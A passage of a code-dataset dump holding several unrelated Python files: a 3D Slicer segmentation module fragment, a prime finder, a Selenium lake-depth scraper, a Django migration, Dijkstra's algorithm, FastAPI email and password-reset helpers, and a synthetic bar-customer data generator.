              (min_v[0], max_v[1], min_v[2] - depth))))
        vertices = np.append(table, vertices, axis=0)
        # Center the combined mesh; protocol sends center + centered vertices.
        max_v = np.max(np.max(vertices, axis=0), axis=0)
        min_v = np.min(np.min(vertices, axis=0), axis=0)
        center = (max_v - min_v) / 2 + min_v
        vertices -= center
        # Convert to Float
        # Header (-2., 0.) presumably tags this message as "patient mesh" — TODO confirm protocol.
        sendArray = np.append(np.append(np.asarray((-2., 0.)), center), np.ndarray.flatten(vertices))
        for s in self.socketReceiveSend:
            s.send(str(sendArray.tolist()).encode())
        # Wait for bb to be applied
        for s in self.socketReceiveSend:
            s.recv(102400)

    @staticmethod
    def isValidInputOutputData(inputVolumeNode, outputModel, targetNode):
        """Validates if the output is not the same as input
        """
        if not inputVolumeNode:
            logging.debug('isValidInputOutputData failed: no input volume node defined')
            return False
        if not outputModel:
            logging.debug('isValidInputOutputData failed: no output volume node defined')
            return False
        if not targetNode:
            logging.debug('isValidInputOutputData failed: no target node defined')
            return False
        return True

    def waypoint(self, percentageDone=None, log=None):
        """Report progress and check for cancellation.  Returns True exactly
        once after a cancel request (the flag is consumed)."""
        if log:
            logging.info(log)
        if self.updateCallback:
            self.updateCallback(percentageDone)
        if self.cancel:
            self.cancel = False
            return True
        return False

    def cleanUp(self):
        """Remove the working segmentation node from the scene, if any."""
        if self.segmentationNode is not None:
            slicer.mrmlScene.RemoveNode(self.segmentationNode)

    def initSegmentationNode(self, inputVolume):
        """Create a fresh segmentation node with an empty 'skin' segment and a
        segment editor wired to it; returns (segmentID, widget, editorNode)."""
        self.segmentationNode = slicer.mrmlScene.AddNewNodeByClass("vtkMRMLSegmentationNode")
        self.segmentationNode.SetReferenceImageGeometryParameterFromVolumeNode(inputVolume)
        addedSegmentID = self.segmentationNode.GetSegmentation().AddEmptySegment("skin")
        segmentEditorWidget = slicer.qMRMLSegmentEditorWidget()
        segmentEditorWidget.setMRMLScene(slicer.mrmlScene)
        segmentEditorNode = slicer.mrmlScene.AddNewNodeByClass("vtkMRMLSegmentEditorNode")
        segmentEditorWidget.setMRMLSegmentEditorNode(segmentEditorNode)
        segmentEditorWidget.setSegmentationNode(self.segmentationNode)
        segmentEditorWidget.setMasterVolumeNode(inputVolume)
        return addedSegmentID, segmentEditorWidget, segmentEditorNode

    def applyThresholding(self, segmentEditorWidget, inputVolume):
        """Apply the Threshold effect from imageThreshold up to the volume max."""
        rangeHU = inputVolume.GetImageData().GetScalarRange()
        # Thresholding
        segmentEditorWidget.setActiveEffectByName("Threshold")
        effect = segmentEditorWidget.activeEffect()
        effect.setParameter("MinimumThreshold", self.imageThreshold)
        effect.setParameter("MaximumThreshold", rangeHU[1])
        effect.self().onApply()

    def applyLargestIsland(self, segmentEditorWidget):
        """Keep only the largest connected component of the segment."""
        segmentEditorWidget.setActiveEffectByName("Islands")
        effect = segmentEditorWidget.activeEffect()
        effect.setParameter("Operation", "KEEP_LARGEST_ISLAND")
        effect.setParameter("MinimumSize", 1000)
        effect.self().onApply()

    def applySmoothing(self, segmentEditorWidget):
        """Apply morphological closing (10 mm kernel) to fill holes."""
        segmentEditorWidget.setActiveEffectByName("Smoothing")
        effect = segmentEditorWidget.activeEffect()
        effect.setParameter("SmoothingMethod", "CLOSING")
        effect.setParameter("KernelSizeMm", 10)
        effect.self().onApply()

    def applyInverting(self, segmentEditorWidget):
        """Invert the segment via the Logical operators effect."""
        segmentEditorWidget.setActiveEffectByName("Logical operators")
        effect = segmentEditorWidget.activeEffect()
        effect.setParameter("Operation", "INVERT")
        effect.self().onApply()
def calcDensityInThread(logic: BestPathVisualizationLogic, indices: list, insideTransformed: np.ndarray):
    """Fan the density computation out over one process per CPU core.

    Each worker receives a contiguous slice of ``indices`` (and matching rows
    of ``insideTransformed``) and returns its densities through a Queue; the
    results are written back into ``logic.scalarData`` at the same slices.
    Always returns True.
    """
    indices_per_process = int(np.ceil(len(indices) / cpu_count()))
    sent = 0
    processes = []
    # Replace stdin for the children — presumably a workaround for
    # multiprocessing inside Slicer's embedded interpreter; TODO confirm.
    original_stdin = sys.stdin
    sys.stdin = open(os.devnull)
    try:
        for _ in range(cpu_count()):
            if sent >= len(indices):
                break
            local_sent = min(sent + indices_per_process, len(indices))
            q = Queue()
            p = Process(target=calcDensityImpl, args=(
                q, logic.targetPoint, logic.arrShape, insideTransformed[sent:local_sent, :], indices[sent:local_sent],
                logic.imageThreshold, logic.globalMaxDensity, logic.inputVolumeNPArray, logic.overlayTypeIndex,
                logic.spacing))
            sent = local_sent
            p.start()
            processes.append((q, p))
        # Collect in spawn order so slice boundaries line up with the workers.
        sent = 0
        for q, p in processes:
            if sent >= len(indices):
                break
            local_sent = min(sent + indices_per_process, len(indices))
            # q.get() before join: draining the queue avoids a deadlock when
            # the child's result exceeds the pipe buffer.
            np.asarray(logic.scalarData)[indices[sent:local_sent]] = q.get()
            p.join()
            sent = local_sent
    finally:
        sys.stdin.close()
        sys.stdin = original_stdin
    return True
def calcDensityImpl(q: Queue, targetPoint: np.ndarray, arrShape: np.ndarray, insideTransformed: np.ndarray,
                    indices: list, imageThreshold: float,
                    globalMaxDensity: float, inputVolumeNPArray: np.ndarray, overlayTypeIndex: int,
                    spacing: np.ndarray):
    """Worker-process entry point: compute the density metric for each point
    in ``indices`` and push the resulting array onto the queue."""
    densities = np.zeros(len(indices))
    for out_pos, point_idx in enumerate(indices):
        densities[out_pos] = overlay.calcDensity(
            targetPoint, arrShape, insideTransformed[out_pos], point_idx,
            imageThreshold, globalMaxDensity, inputVolumeNPArray, overlayTypeIndex,
            spacing)
    q.put(densities)
def executeInPeices(function, indices, outArray):
    """Run `function` over chunks of `indices` in parallel worker processes.

    `function(queue, chunk, start_offset)` must put one result array per chunk
    on its queue; results are written back into `outArray[chunk]`.
    (Name kept as-is for callers, despite the 'Peices' typo.)
    """
    chunk_size = int(np.ceil(len(indices) / cpu_count()))
    workers = []
    saved_stdin = sys.stdin
    # Detach stdin so child processes cannot block on it.
    sys.stdin = open(os.devnull)
    try:
        # Launch one worker per chunk.
        offset = 0
        for _ in range(cpu_count()):
            if offset >= len(indices):
                break
            end = min(offset + chunk_size, len(indices))
            result_queue = Queue()
            worker = Process(target=function,
                             args=(result_queue, indices[offset:end], offset))
            offset = end
            worker.start()
            workers.append((result_queue, worker))
        # Collect results in launch order.
        offset = 0
        for result_queue, worker in workers:
            if offset >= len(indices):
                break
            end = min(offset + chunk_size, len(indices))
            outArray[indices[offset:end]] = result_queue.get()
            worker.join()
            offset = end
    finally:
        sys.stdin.close()
        sys.stdin = saved_stdin
|
[
"stefan.gerlach@tuhh.de"
] |
stefan.gerlach@tuhh.de
|
16646a3eed6770bf209dba69949d33c6bcd46b9e
|
f71601a72f5fe57b8e21f71093dde06bf30d609d
|
/coding_solutions/Day16(3-06-2020)/PrimeInterval.py
|
18446d9453565051fb5e83b99cd3d6c22745d631
|
[] |
no_license
|
alvas-education-foundation/Dhanya-bhat
|
eb812fdd6ae28bf45d9db3d1f691f0abc2ef926e
|
aadf27ca7ed0832e215db1938201bb3896df327b
|
refs/heads/master
| 2022-12-02T07:59:01.386373
| 2020-08-10T13:11:50
| 2020-08-10T13:11:50
| 265,844,554
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 249
|
py
|
l = int(input("Enter start point: "))
u = int(input("Enter end point: "))
for num in range(l,u + 1):
if num > 1:
for i in range(2,num):
if (num % i) == 0:
break
else:
print(num)
|
[
"dhanyabhat29@gmail.com"
] |
dhanyabhat29@gmail.com
|
505d970dbb3fbfed63db57de304445fbdbfe37c9
|
5d24987bce37f5e5ae60a4f550d0b5723ebe7718
|
/Preparing data/odata_download.py
|
1dd62c7c0425686f3392f16d70f405b6a10739ee
|
[] |
no_license
|
saraheikonen/eutrophication-drivers
|
53e3c8138e4663cd0df1a54a47ee1a6b759ec652
|
fadc7e08252ff9d144aea768c7f4a1153e479762
|
refs/heads/main
| 2023-04-14T09:10:13.728341
| 2022-07-13T11:21:06
| 2022-07-13T11:21:06
| 504,433,294
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,255
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Fri Jun 18 13:11:46 2021
@author: sarah
"""
from selenium import webdriver
from selenium.webdriver.support.ui import Select
import geopandas as gpd
import numpy as np
import os
# give paths to catchment shapefile (basins_path), to chromedriver.exe and where
# to save catchments with depth
basins_path = 'Y:/Dippa/Data/model_input/basins/lake_catchments'
# Fix: the original had a redundant chained self-assignment
# (`chromedriver_path = chromedriver_path = ...`).
chromedriver_path = 'Y:/Dippa/Koodi local/Download data/chromedriver'
save_path = 'Y:/Dippa/Data/basins/lake_catchments_with_depth'

# if save path doesn't exist, create folder
if not os.path.exists(save_path):
    os.makedirs(save_path)
def build_query(short_id, driver):
    """Fetch a lake's mean depth (m) from jarvirajapinta's OData query builder.

    Drives the query-builder UI with selenium: selects the 'jarvi' entity,
    filters on the shortened lake id, selects the mean-depth column, submits,
    and reads the single result cell. Returns the depth as float, or NaN when
    the result cell is empty. Resets the form before returning.
    """
    # open jarvirajapinta querybuilder
    jarviapi_url = 'http://rajapinnat.ymparisto.fi/api/jarvirajapinta/1.0/ODataQueryBuilder/'
    driver.get(jarviapi_url)

    # limit to the top 1 result
    top_dropdown = Select(driver.find_element_by_id('top'))
    top_dropdown.select_by_value('1')
    driver.implicitly_wait(5)

    # pick the 'jarvi' (lake) entity
    entity_dropdown = Select(driver.find_element_by_id('entities'))
    entity_dropdown.select_by_value('0')
    driver.implicitly_wait(5)

    # where-condition on the shortened lake id
    driver.find_element_by_id('addCondition').click()
    condition_dropdown = Select(driver.find_element_by_class_name('property'))
    condition_dropdown.select_by_value('1')
    driver.implicitly_wait(5)

    # comparison operator: equals
    operator_dropdown = Select(driver.find_element_by_class_name('propertyFilter'))
    operator_dropdown.select_by_value('0')
    driver.implicitly_wait(5)

    # type the short id into the filter input
    driver.find_element_by_class_name('propertyFilterInput').send_keys(short_id)

    # select the output column: mean depth in meters
    driver.find_element_by_id('addSelectCondition').click()
    depth_column = driver.find_element_by_id('selectcolumn_24')
    depth_column.click()
    driver.implicitly_wait(5)

    # submit the query
    driver.find_element_by_id('submitQuery').click()

    # read the single result cell
    driver.implicitly_wait(5)
    mean_depth = driver.find_element_by_xpath('/html/body/div/div[2]/table/tbody/tr/td').text
    if len(mean_depth) > 0:
        depth_value = float(mean_depth)
    else:
        depth_value = np.nan

    # clear the form so the next call starts fresh
    driver.find_element_by_id('clearQuery').click()
    return depth_value
def main(basins_path, chromedriver_path, save_path):
    """Attach a mean-depth attribute to every catchment and save the shapefile."""
    catchments = gpd.read_file(basins_path)
    # shortened VPDTunnus (part before the underscore) is the lake id the API expects
    catchments['VPDLyh'] = catchments.apply(lambda row: row.VPDTunnus.split('_')[0], axis=1)
    # set up chromedriver
    browser = webdriver.Chrome(executable_path=chromedriver_path)
    # query the API once per catchment and store the result
    catchments.insert(5, 'mean_depth', np.nan)
    catchments.loc[:, 'mean_depth'] = catchments.apply(lambda row: build_query(row.VPDLyh, browser), axis=1)
    browser.close()
    catchments.to_file(save_path + '/basins_with_lake_depth.shp')


main(basins_path, chromedriver_path, save_path)
|
[
"noreply@github.com"
] |
noreply@github.com
|
f59676ae9eac334e4b46372346f1f0b0d5844c4e
|
c60c199410289c1d7ec4aea00833b461e1f08f88
|
/27-29-nov-2014/day1/stringiter2.py
|
027138065a5897ed5823bf0d6c686f23c0a0f2de
|
[] |
no_license
|
ver007/pythonjumpstart
|
66fb111e6af197fad3e853b2c2d712a1b57a7d59
|
5b1f52479abd07456e2da494149e491d398f3b7d
|
refs/heads/master
| 2021-01-21T01:34:35.501870
| 2015-05-13T14:10:13
| 2015-05-13T14:10:13
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 95
|
py
|
__author__ = 'ravi'
s = 'aeiou'
i = 1
for char in s:
print "{}".format(char*i)
i += 1
|
[
"ravi@rootcap.in"
] |
ravi@rootcap.in
|
a8ac5edd27c7ac2656e13272e14dc4959808b147
|
d4f7457a15472788821c31f3ffbbefc620e7984d
|
/student/migrations/0013_alter_project_upload_images.py
|
04373a559a4e521a42d067291e21dee28c0666b7
|
[] |
no_license
|
shashiprajj/Resume_master
|
9d3a48650d66b0912742676ada41810274f2b8e3
|
3acc94b0bb5dd140ea1ecc2fba2550ef71a556ef
|
refs/heads/master
| 2023-07-02T15:14:18.578101
| 2021-08-07T20:21:21
| 2021-08-07T20:21:21
| 393,724,046
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 433
|
py
|
# Generated by Django 3.2.3 on 2021-05-30 16:30
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated migration: allow Project.upload_images to be empty
    # (blank=True for forms, null=True in the database).

    dependencies = [
        ('student', '0012_alter_project_upload_images'),
    ]

    operations = [
        migrations.AlterField(
            model_name='project',
            name='upload_images',
            field=models.FileField(blank=True, null=True, upload_to='projects'),
        ),
    ]
|
[
"shashiprajj@gmail.com"
] |
shashiprajj@gmail.com
|
f9c5db59cf745e342ac21e9f1ee948e6452c7beb
|
c523eff326b8bc6c0c903bf7fe16ec3b98605bff
|
/choieungi/boj/다익스트라_우선순위큐.py
|
24bc8f468ea051c8473f4f4dbe8747fbce8c0e78
|
[] |
no_license
|
IgoAlgo/Problem-Solving
|
c76fc157c4dd2afeeb72a7e4a1833b730a0b441d
|
5cc57d532b2887cf4eec8591dafc5ef611c3c409
|
refs/heads/master
| 2023-06-26T05:12:02.449706
| 2021-07-14T06:57:00
| 2021-07-14T06:57:00
| 328,959,557
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,856
|
py
|
import heapq
import sys
input = sys.stdin.readline
INF = int(1e9)  # value used as "infinity" (one billion)

# read the number of nodes (n) and edges (m)
n, m = map(int, input().split())
# read the start node number
start = int(input())
# adjacency list: graph[a] holds (destination, cost) pairs for node a
graph = [[] for i in range(n + 1)]
# shortest-distance table, initialised to infinity
distance = [INF] * (n + 1)

# read every edge
for _ in range(m):
    a, b, c = map(int, input().split())
    # going from node a to node b costs c
    graph[a].append((b, c))
def dijkstra(start):
    """Single-source shortest paths from `start`, filling the global `distance` table."""
    q = []
    # the shortest path to the start node itself is 0; seed the priority queue with it
    heapq.heappush(q, (0, start))
    distance[start] = 0
    while q:  # while the queue is not empty
        # pop the node with the smallest tentative distance
        dist, now = heapq.heappop(q)
        # skip entries for nodes already finalised with a shorter distance
        if distance[now] < dist:
            continue
        # relax every edge out of the current node
        for i in graph[now]:
            cost = dist + i[1]
            # found a shorter route to i[0] going through `now`
            if cost < distance[i[0]]:
                distance[i[0]] = cost
                heapq.heappush(q, (cost, i[0]))
# run Dijkstra's algorithm
dijkstra(start)

# print the shortest distance to every node
for i in range(1, n + 1):
    # unreachable nodes are reported as INFINITY
    if distance[i] == INF:
        print("INFINITY")
    # otherwise print the computed distance
    else:
        print(distance[i])
|
[
"choieungi@gm.gist.ac.kr"
] |
choieungi@gm.gist.ac.kr
|
18d4a948b0ca382c4d01997d274c1deb0cbccddf
|
b92226895d04b0258981864e8604720de9c09f4d
|
/src/utils.py
|
3200a377f749da6ea1b234e191737060009fa795
|
[
"BSD-3-Clause"
] |
permissive
|
aydinmemis/blog_FastAPI
|
e42a6c4f5a9c64154da0f9a23290c274b305838a
|
f584634a2cd410904df6a7d9478044d269737a91
|
refs/heads/master
| 2022-04-06T12:37:59.068303
| 2020-03-11T18:04:14
| 2020-03-11T18:04:14
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,688
|
py
|
import logging
from datetime import datetime, timedelta
from pathlib import Path
from typing import Optional
import emails
import jwt
from emails.template import JinjaTemplate
from jwt.exceptions import InvalidTokenError
from core import config
password_reset_jwt_subject = "preset"
def send_email(email_to: str, subject_template="", html_template="", environment=None):
    """Render the Jinja subject/html templates and send an email over SMTP.

    Bug fix: `environment` previously defaulted to a shared mutable dict
    (`{}`), which every call without an explicit environment would reuse;
    a None sentinel avoids the shared-state pitfall with identical behavior.
    """
    assert config.EMAILS_ENABLED, "no provided configuration for email variables"
    if environment is None:
        environment = {}
    message = emails.Message(
        subject=JinjaTemplate(subject_template),
        html=JinjaTemplate(html_template),
        mail_from=(config.EMAILS_FROM_NAME, config.EMAILS_FROM_EMAIL),
    )
    # SMTP options from config; optional fields only when configured
    smtp_options = {"host": config.SMTP_HOST, "port": config.SMTP_PORT}
    if config.SMTP_TLS:
        smtp_options["tls"] = True
    if config.SMTP_USER:
        smtp_options["user"] = config.SMTP_USER
    if config.SMTP_PASSWORD:
        smtp_options["password"] = config.SMTP_PASSWORD
    response = message.send(to=email_to, render=environment, smtp=smtp_options)
    logging.info(f"send email result: {response}")
def send_test_email(email_to: str):
    """Send the 'test email' template to the given address."""
    subject = f"{config.PROJECT_NAME} - Test email"
    template_path = Path(config.EMAIL_TEMPLATES_DIR) / "test_email.html"
    with open(template_path) as f:
        template_str = f.read()
    send_email(
        email_to=email_to,
        subject_template=subject,
        html_template=template_str,
        environment={"project_name": config.PROJECT_NAME, "email": email_to},
    )
def send_reset_password_email(email_to: str, email: str, token: str):
    """Send the password-recovery email containing the tokenised reset link."""
    subject = f"{config.PROJECT_NAME} - Password recovery for user {email}"
    with open(Path(config.EMAIL_TEMPLATES_DIR) / "reset_password.html") as f:
        template_str = f.read()
    # some JWT backends return bytes; normalise to str for the URL
    if hasattr(token, "decode"):
        use_token = token.decode()
    else:
        use_token = token
    link = f"{config.SERVER_HOST}/reset-password?token={use_token}"
    send_email(
        email_to=email_to,
        subject_template=subject,
        html_template=template_str,
        environment={
            "project_name": config.PROJECT_NAME,
            "username": email,
            "email": email_to,
            "valid_hours": config.EMAIL_RESET_TOKEN_EXPIRE_HOURS,
            "link": link,
        },
    )
def send_new_account_email(email_to: str, username: str, password: str):
    """Send the 'new account created' email with credentials and a server link."""
    subject = f"{config.PROJECT_NAME} - New account for user {username}"
    with open(Path(config.EMAIL_TEMPLATES_DIR) / "new_account.html") as f:
        template_str = f.read()
    send_email(
        email_to=email_to,
        subject_template=subject,
        html_template=template_str,
        environment={
            "project_name": config.PROJECT_NAME,
            "username": username,
            "password": password,
            "email": email_to,
            "link": config.SERVER_HOST,
        },
    )
def generate_password_reset_token(email):
    """Create a signed password-reset JWT for `email`.

    Bug fix: the original computed ``exp`` via ``datetime.utcnow().timestamp()``.
    ``utcnow()`` returns a *naive* datetime and ``.timestamp()`` interprets naive
    values as local time, so the expiry was shifted by the machine's UTC offset.
    PyJWT accepts datetime values for ``exp``/``nbf`` and converts them as UTC,
    so we pass the datetimes directly.
    """
    now = datetime.utcnow()
    expires = now + timedelta(hours=config.EMAIL_RESET_TOKEN_EXPIRE_HOURS)
    encoded_jwt = jwt.encode(
        {"exp": expires, "nbf": now, "sub": password_reset_jwt_subject, "email": email},
        config.SECRET_KEY,
        algorithm="HS256",
    )
    return encoded_jwt
def verify_password_reset_token(token) -> Optional[str]:
    """Return the email embedded in a valid reset token, or None when invalid.

    Bug fix: the original validated the subject with ``assert``, which is
    stripped under ``python -O`` and otherwise raised an uncaught
    AssertionError (only InvalidTokenError was handled). A wrong subject or
    missing email now yields None like any other invalid token.
    """
    try:
        decoded_token = jwt.decode(token, config.SECRET_KEY, algorithms=["HS256"])
    except InvalidTokenError:
        return None
    if decoded_token.get("sub") != password_reset_jwt_subject:
        return None
    return decoded_token.get("email")
|
[
"socanime@gmail.com"
] |
socanime@gmail.com
|
2e9bb71c6257e2923c9b3b65dbe3d1d47201c11e
|
795f88819c160f32c346e9698501957fa08cb743
|
/dataGenerator/dataGenerator.py
|
c2a6d8ae1256deca034ab146eeee2aeefe47c2e1
|
[
"MIT"
] |
permissive
|
GwennaelBuchet/zenibar
|
367c9526c4cb447c5eb28ec7bd95e5f8be575213
|
ea7c8bcb287377ff416a80b477bce00b4edd63ad
|
refs/heads/master
| 2021-09-05T05:29:27.734597
| 2018-01-24T12:10:29
| 2018-01-24T12:10:29
| 115,437,079
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 17,367
|
py
|
from datetime import datetime as _dt
from datetime import date as _date
from datetime import timedelta as _td
import math
import random
import json
class Beer:
    """A beer on the bar's menu: identity, characteristics, price and stock."""

    def __init__(self, id, brand, model, strongness, style, color, origin, price):
        self.id = id
        self.brand = brand
        self.model = model
        self.strongness = strongness  # alcohol %
        self.style = style
        self.color = color
        self.origin = origin
        self.rank = 0    # customer-assigned rating, set when matched to a customer
        self.price = price
        self.stock = 0

    def canMatch(self, conditions):
        """Return True when this beer satisfies every condition string.

        Each condition (e.g. "strongness>6") is eval'd against `self`.
        NOTE(review): eval on strings — only safe with trusted,
        program-generated conditions, never user input.
        """
        for condition in conditions:
            if eval("self." + condition) == False:
                return False
        return True

    def _try(self, o):
        # Fallback JSON serializer: nested objects via __dict__, else str().
        # Bug fix: this was a class-level `def _try(o)` that the to_JSON lambda
        # referenced as a bare global name — a NameError whenever json.dumps
        # needed the default. Now an instance method, consistent with Bar.
        try:
            return o.__dict__
        except:
            return str(o)

    def to_JSON(self):
        """Serialize this beer to a compact single-line JSON string."""
        return json.dumps(self, default=lambda o: self._try(o), sort_keys=True, indent=0,
                          separators=(',', ':')).replace('\n', '')
class Customer:
    """A bar customer: identity, visit window, drinking habits and history."""

    def __init__(self, id, firstname, lastname,
                 registrationDate, lastvisitDate,
                 averageUptakesPerDay, habits, ponderationDays, amount):
        self.id = id
        self.firstname = firstname
        self.lastname = lastname
        # registration / last-visit dates, kept whole and split into Y/M/D fields
        self.registrationYear = registrationDate.year
        self.registrationMonth = registrationDate.month
        self.registrationDay = registrationDate.day
        self.registrationDate = registrationDate
        self.lastvisitYear = lastvisitDate.year
        self.lastvisitMonth = lastvisitDate.month
        self.lastvisitDay = lastvisitDate.day
        self.lastvisitDate = lastvisitDate
        self.averageUptakesPerDay = averageUptakesPerDay
        self.habits = habits
        # beers that fit the habits/preferences of this customer
        self.suitableBeers = []
        self.uptakes = []
        # ponderationDays correspond to the percents of chance the customer will go to the bar for each day of the week
        self.ponderationDays = ponderationDays
        self.amount = amount

    @staticmethod
    def generateName(indice):
        """Return [firstname, lastname]: a fixed name for small indices, random after."""
        namesList = [["Adrien", "Legrand"], ["Gwennael", "Buchet"], ["Marcel", "Beliveau"], ["Sasha", "Foxxx"],
                     ["Jenna", "Haze"], ["Riley", "Reid"], ["Kobe", "Tai"], ["Daisie", "Marie"], ["Lisa", "Ann"],
                     ["Tori", "Black"], ["Jannice", "Griffith"], ["Emilie", "Grey"], ["Mia", "Khalifa"],
                     ["Cassidy", "Banks"], ["Régine", "Zylberberg"], ["Nikita", "Bellucci"]]
        firstnames = ["Amber", "Andy", "Natasha", "Sandy", "Aurora", "Susie", "Cathy", "Clara", "Coralie", "Erika",
                      "Estelle", "Jenna", "Kelly", "Teri", "Shannon", "Jasmin", "Stormy", "Dolly", "Gina", "Heather",
                      "Julia", "Marilyn", "Olivia", "Vanessa", "Nikita", "Brigitte"]
        lastnames = ["Labouche", "Storm", "Doll", "Lynn", "Vega", "Lord", "Kitty", "Angel", "Amor", "Dee", "Pecheresse",
                     "King", "Young", "Love", "Star", "Tits", "Moon", "Tekila", "Coco", "Shave", "Canelle", "Chocolat",
                     "Barbie", "Ladyboy", "Queer", "Dior", "Stone", "Kass", "Pink"]
        if indice < len(namesList):
            return namesList[indice]
        firstname = firstnames[math.ceil(random.random() * len(firstnames)) - 1]
        lastname = lastnames[(indice - len(namesList) - 1) % len(lastnames)]
        return [firstname, lastname]

    @staticmethod
    def generateFirstDate():
        """Registration date: up to 60 days after the bar opened."""
        delta = _td(math.ceil(random.random() * 60))
        return OPENING_DATE + delta

    @staticmethod
    def generateLastDate():
        """Last visit: up to 30 days before the final generated date."""
        delta = _td(math.ceil(random.random() * 30))
        return LAST_DATE - delta

    @staticmethod
    def generateAverageUptakes():
        """Average beers per visit: 2..6."""
        return 1 + math.ceil(random.random() * 5)

    @staticmethod
    def generatePonderations():
        """Chance of visiting per weekday (Mon..Sun); the bar is closed Sunday."""
        ponderations = []
        ponderations.append(random.random() / 5)  # monday
        ponderations.append(0.2 + random.random() / 3.5)  # tuesday
        ponderations.append(0.2 + random.random() / 3)  # wednesday
        ponderations.append(0.3 + random.random() / 2)  # thursday
        ponderations.append(0.35 + random.random() / 2)  # friday
        ponderations.append(0.66 + random.random() / 3)  # saturday
        ponderations.append(0)  # sunday. Bar is closed
        return ponderations

    @staticmethod
    def generateHabits():
        """Random taste profile: a strongness bound plus style and color whitelists."""
        habits = []
        # strongness: random bound in [4, 9], direction constrained at the extremes
        strongness = round(4 + random.random() * 5, 1)
        strongnessSign = "<" if math.copysign(1, -1 + random.random() * 2) < 0 else ">"
        if strongness <= 6:
            strongnessSign = ">"
        if strongness >= 9:
            strongnessSign = "<"
        habits.append("strongness" + strongnessSign + str(strongness))
        # style: each style has a 50% chance of being liked
        allStyles = ["'IPA'", "'Amber'", "'Belgian Pale Ale'", "'Belgian Dark Ale'", "'Lager'", "'Abbaye'", "'White'",
                     "'Alcool Free'", "'Extra Special Bitter'"]
        selectedStyles = []
        for s in allStyles:
            if random.random() < 0.5:
                selectedStyles.append(s)
        style = "style in [" + ", ".join(selectedStyles)
        style += "]"
        habits.append(style)
        # color: each color has a 50% chance of being liked
        allColors = ["'White'", "'Blond'", "'Amber'", "'Brown'", "'Black'"]
        selectedColors = []
        for i, c in enumerate(allColors):
            if random.random() < 0.5:
                selectedColors.append(c)
        color = "color in [" + ", ".join(selectedColors)
        color += "]"
        habits.append(color)
        return habits

    @staticmethod
    def generateAmount():
        """Money available: 37..76."""
        return math.ceil(36 + random.random() * 40)

    def _try(self, o):
        # Fallback JSON serializer: nested objects via __dict__, else str().
        # Bug fix: this was a class-level `def _try(o)` that to_JSON's lambda
        # referenced as a bare global — a NameError whenever json.dumps hit a
        # non-serializable attribute (e.g. the datetime fields). Now an
        # instance method, consistent with Bar.
        try:
            return o.__dict__
        except:
            return str(o)

    def to_JSON(self):
        """Serialize this customer to a compact single-line JSON string."""
        return json.dumps(self, default=lambda o: self._try(o), sort_keys=True, indent=0,
                          separators=(',', ':')).replace('\n', '')
class Uptake:
    """One customer's beer consumption for a single visit: customer id + beer ids."""

    def __init__(self, customerId, beersId):
        self.customerId = customerId
        self.beersId = beersId

    def _try(self, o):
        # Fallback JSON serializer (bug fix: was a bare `def _try(o)` that
        # to_JSON's lambda could not resolve — NameError if ever invoked).
        try:
            return o.__dict__
        except:
            return str(o)

    def to_JSON(self):
        """Serialize to a compact single-line JSON string."""
        return json.dumps(self, default=lambda o: self._try(o), sort_keys=True, indent=0,
                          separators=(',', ':')).replace('\n', '')
class DailyUptakes:
    """History of uptakes for 1 day: the weather, the date, and the uptakes list."""

    def __init__(self, weather, singleDateTime):
        self.weather = weather
        self.year = singleDateTime.year
        self.month = singleDateTime.month
        self.day = singleDateTime.day
        self.uptakes = []

    def _try(self, o):
        # Fallback JSON serializer: nested objects (Weather, Uptake) via
        # __dict__. Bug fix: was a bare `def _try(o)` the to_JSON lambda could
        # not resolve — NameError as soon as a weather object was serialized.
        try:
            return o.__dict__
        except:
            return str(o)

    def to_JSON(self):
        """Serialize to a compact single-line JSON string."""
        return json.dumps(self, default=lambda o: self._try(o), sort_keys=True, indent=0,
                          separators=(',', ':')).replace('\n', '')
class CustomerDailyUptakes:
    """One day's consumption recorded on a customer: the date plus the beer ids."""

    def __init__(self, singleDateTime, beersId):
        self.year = singleDateTime.year
        self.month = singleDateTime.month
        self.day = singleDateTime.day
        self.beersId = beersId

    def _try(self, o):
        # Fallback JSON serializer (bug fix: was a bare `def _try(o)` that
        # to_JSON's lambda could not resolve — NameError if ever invoked).
        try:
            return o.__dict__
        except:
            return str(o)

    def to_JSON(self):
        """Serialize to a compact single-line JSON string."""
        return json.dumps(self, default=lambda o: self._try(o), sort_keys=True, indent=0,
                          separators=(',', ':')).replace('\n', '')
class Bar:
    """The bar: its beer menu, registered customers and daily uptake history."""

    def __init__(self, beers, customers):
        self.dailyUptakes = []
        self.beers = beers
        self.customers = []
        self.nbTotalUptakes = 0
        # go through addCustomer() (not a plain append) so suitable beers are computed
        for customer in customers:
            self.addCustomer(customer)

    def addCustomer(self, customer):
        # Ensure every customer likes at least one beer on the menu:
        # re-roll their habits until some beer matches.
        self.addSuitableBeersToCustomer(customer)
        while len(customer.suitableBeers) == 0:
            customer.habits = Customer.generateHabits()
            self.addSuitableBeersToCustomer(customer)
        self.customers.append(customer)

    def addBeer(self, beer):
        # register the beer and propagate it to matching customers
        self.addSuitableBeerToCustomers(beer)
        self.beers.append(beer)

    def addSuitableBeersToCustomer(self, customer):
        """ Try to find beers in this bar which can fit customer's habits """
        for beer in self.beers:
            if beer.canMatch(customer.habits):
                customer.suitableBeers.append(beer)
                # give the newly matched beer a random rank of 4..6
                customer.suitableBeers[len(customer.suitableBeers) - 1].rank = 3 + math.ceil(random.random() * 3)

    def addSuitableBeerToCustomers(self, beer):
        """ Try to find customers who can like this beer """
        for customer in self.customers:
            if beer.canMatch(customer.habits):
                customer.suitableBeers.append(beer)
                customer.suitableBeers[len(customer.suitableBeers) - 1].rank = 3 + math.ceil(random.random() * 3)

    def _try(self, o):
        # Fallback JSON serializer: nested objects via __dict__, else str().
        try:
            return o.__dict__
        except:
            return str(o)

    def to_JSON(self):
        """Serialize the whole bar (menu, customers, history) to one JSON line."""
        return json.dumps(self, default=lambda o: self._try(o), sort_keys=True, indent=0,
                          separators=(',', ':')).replace(
            '\n', '')
class Weather:
    """A day's weather condition: temperature (°C) and humidity (0..1)."""

    def __init__(self, temperature, humidity):
        self.temperature = temperature
        self.humidity = humidity

    def _try(self, o):
